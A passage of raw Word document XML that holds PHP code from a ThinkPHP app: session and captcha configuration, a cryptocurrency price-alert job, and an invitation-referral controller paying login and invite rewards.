      </w:r>
    </w:p>
    <w:p w14:paraId="55FDE1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'var_session_id' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFD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'prefix'         =&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE2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'auto_start'     =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286516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B83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'cookie'                 =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B84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'prefix'    =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35D0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'expire'    =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47830D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'path'      =&gt; '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F4C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=&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F366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'secure'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5F9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'httponly'  =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0BD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'setcookie' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC932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956C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'paginate'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70C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'bootstrap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052247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'var_page'  =&gt; 'page',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FE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'list_rows' =&gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DE5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A13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'captcha'  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A43E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'codeSet'  =&gt; '0123456789',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D087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'fontSize' =&gt; 18, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932F2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'useCurve' =&gt; false, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52860E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'imageH'   =&gt; 30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECC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'imageW'   =&gt; 120, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B8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'length'   =&gt; 3, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB25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'reset'    =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A91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0540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07D7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99B00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app\behavior;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D02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1D34F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ActionLog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151EE6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D89C7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B94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@name</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据交易所最新币种报价匹配用户关注的提醒价格以及对应用户的消息提醒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F537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@by Xh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64A1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9D9F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run($batch_no){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00F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$symbolData = Db::name('ticker')-&gt;field('exchange,symbol,last_price as price')-&gt;where(['batch_no'=&gt;$batch_no])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF668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if(!empty($symbolData)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A9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foreach($symbolData as $key=&gt;$data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B7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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB23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$priceData = '0.05';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5323C4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if(!empty($data['exchange'])&amp;&amp; !empty($data['symbol']) &amp;&amp;!empty($data['price'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D2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$data['exchange'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF8D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 = $data['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C458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$price = $data['price'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039438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$strat = sprintf("%.2f",($price - ($price*$priceData)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68353D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$end = sprintf("%.2f",($price + ($price*$priceData)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D978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$where['exchange'] = ['=',$exchange];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C6B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$where['symbol'] = ['=',$symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6E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$where['price'] = ['between',[$strat,$end]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7CA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$where['handle'] = ['=',0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D5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$coinData = explode('/',$symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D582F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 = $coinData[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A0A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 = Db::name('symbol_alert')-&gt;field('id,member_id,exchange,symbol')-&gt;where($where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114EF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if($userData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43B7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($userData as $key=&gt;$val){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA24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Db::name('symbol_alert')-&gt;where(['id'=&gt;$val['id']])-&gt;update(['handle'=&gt;1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44748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价格提醒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A543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 = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315F3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'type_id'=&gt;4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3499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'recipient_id'=&gt;$val['member_id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E885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'exchange'=&gt;$val['exchange'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6935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'symbol'=&gt;$val['symbol'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D6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'coin_name'=&gt;$coin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E471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'content'=&gt;$content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79109B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'read'=&gt;0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D277D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'create_time'=&gt;time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0502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31E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Db::name('message')-&gt;insert($message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6F4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DF4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F68B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582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92B4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32DE1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264B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21A41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45E6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24AAD3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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488718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think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C09D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think\Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571E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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D575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6B0960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Yaoqing extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6CD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2CE8B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$member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDD8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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56266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1ACAFB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if(!Request::instance()-&gt;isMobile()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EF5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禁止操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F96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A5EB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$config=Db::name('member_config')-&gt;where('name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57C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54FF37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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB8F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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE9C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3A8B8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$token=Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD61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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E638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if($tokenaaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FE1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$token=$tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B4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78C63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json_encode(['err'=&gt;'token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF8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16A40B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5492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74D1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$uid=_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A712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756E1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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2E4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0D6757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867F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$member=_user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB1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3A7CB7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5D8A90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27E40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719D5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3C77C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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F69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256E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6819CB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0A2C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FFF1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3715EF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5FA11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41D06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账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72377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2C12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39C472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071DE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6B6DDB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709AEA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操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021069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4ABBA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账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B820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EA0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5D1426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90FB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1B4AC6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A44B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FF848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会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13030F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76CEA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6E4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$this-&gt;member=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8930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179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zongbang(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60682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$type=input('type/d') ? input('type/d') : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A87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if($type==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB66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$where['a.s1']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C7D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$order='b.create_time desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A2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56EC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$order='a.money_num desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75634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B1F1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$where['b.hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74839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$data=Db::name('yaoqing')-&gt;alias('a')-&gt;join('__MEMBER__ b','a.uid = b.id')-&gt;where($where)-&gt;order($order)-&gt;field('b.id,b.nickname,b.mobile,a.money_num,a.tudi_num,b.create_time')-&gt;paginate(10)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768716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if($type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A34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$pages=input('page');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19ED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if($pages&gt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6A4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$data['total']=100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45184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DF9B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5A24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if($data['data']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64299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2B5A1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$data['data'][$k]['username']=_username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D68F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$data['data'][$k]['money_num']=_money($v['money_num']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77454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$data['data'][$k]['time']=date('m-d H:i',$v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3710A4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88B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042A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03EEB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3F65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mingxi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563216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$type=input('type/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5B8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if($type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A771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$where['a.type']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC53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if($type==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04358D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$where['a.type']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578ED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3192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$where['a.uid']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0B1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56783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['__MEMBER__ b','a.uid = b.id']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9837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867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$data=Db::name('yaoqing_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.time desc')-&gt;field('a.money,a.content,a.time,a.type,b.mobile,b.nickname,a.data,b.id')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961D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4AB075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$data['data'][$k]['username']=_username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E946F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$data['data'][$k]['time']=date('m-d H:i',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FB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$data['data'][$k]['content']=$v['content'].(!$v['data'] ? '&lt;b class="sx-jia"&gt;+' : '&lt;b class="sx-jian"&gt;-').($v['type'] ? $v['money'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : _money($v['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>').'&lt;/b&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F46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6A0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74028A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8C9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yaoqingma(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C543C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$yaoqingma=input('yaoqingma/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACF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if(!$yaoqingma){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449786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请输入邀请码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411EA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E4BCC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if($yaoqingma == $this-&gt;member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBB9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不能自己当师傅哦</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DA8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7E29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$uid=Db::name('yaoqing')-&gt;where(['uid'=&gt;$yaoqingma])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514B0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45C99A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邀请码不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62385A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E70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$my=Db::name('yaoqing')-&gt;where('uid',$this-&gt;member['id'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BFB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D4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if($my['s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB0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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0AD5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6B060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$db=Db::name('yaoqing')-&gt;where('uid',$this-&gt;member['id'])-&gt;setField('s1',$uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37736D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393D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FCD2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$db=Db::name('yaoqing')-&gt;insert(['uid'=&gt;$this-&gt;member['id'],'s1'=&gt;$uid]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261125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D51E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5CEF1B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BFA7B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Db::name('yaoqing')-&gt;where('uid',$uid)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33557C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719E5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$yaoqing=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D9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if($yaoqing['money_yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537255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643A16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$this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADB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$yaoqing['money_yaoqing']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C53D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请码注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DC3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6E27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DC5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3E9E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if($yaoqing['money_yaoqing_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763B0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167DE1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763146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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B670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$yaoqing['money_yaoqing_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B249F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'id:'.$this-&gt;member['id'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功邀请徒弟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67164F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E5A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260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E9A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$text=$yaoqing['money_yaoqing'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜你成功领取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_yaoqing'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元红包</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E397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json_encode(['ret'=&gt;$text]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93D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9B2C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操作失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FB6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A1CC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2E4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daily(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A4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$yaoqing=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA28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$uid=$this-&gt;member['id'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54E7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$s1=$this-&gt;member['yaoqing']['s1']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26348E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49394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if($type=='money_login'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C7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if($yaoqing['money_login']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B9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每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23585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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7759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0C22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$money_login_money=$yaoqing['money_login'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A54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$db=_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC95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'uid'=&gt;$uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4635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'money'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127543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'money'=&gt;$money_login_money*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6A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'content'=&gt;$content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76007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C383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9B9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9BC02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$ret=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA639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json_encode(['ret'=&gt;['h1'=&gt;$money_login_money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜每天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
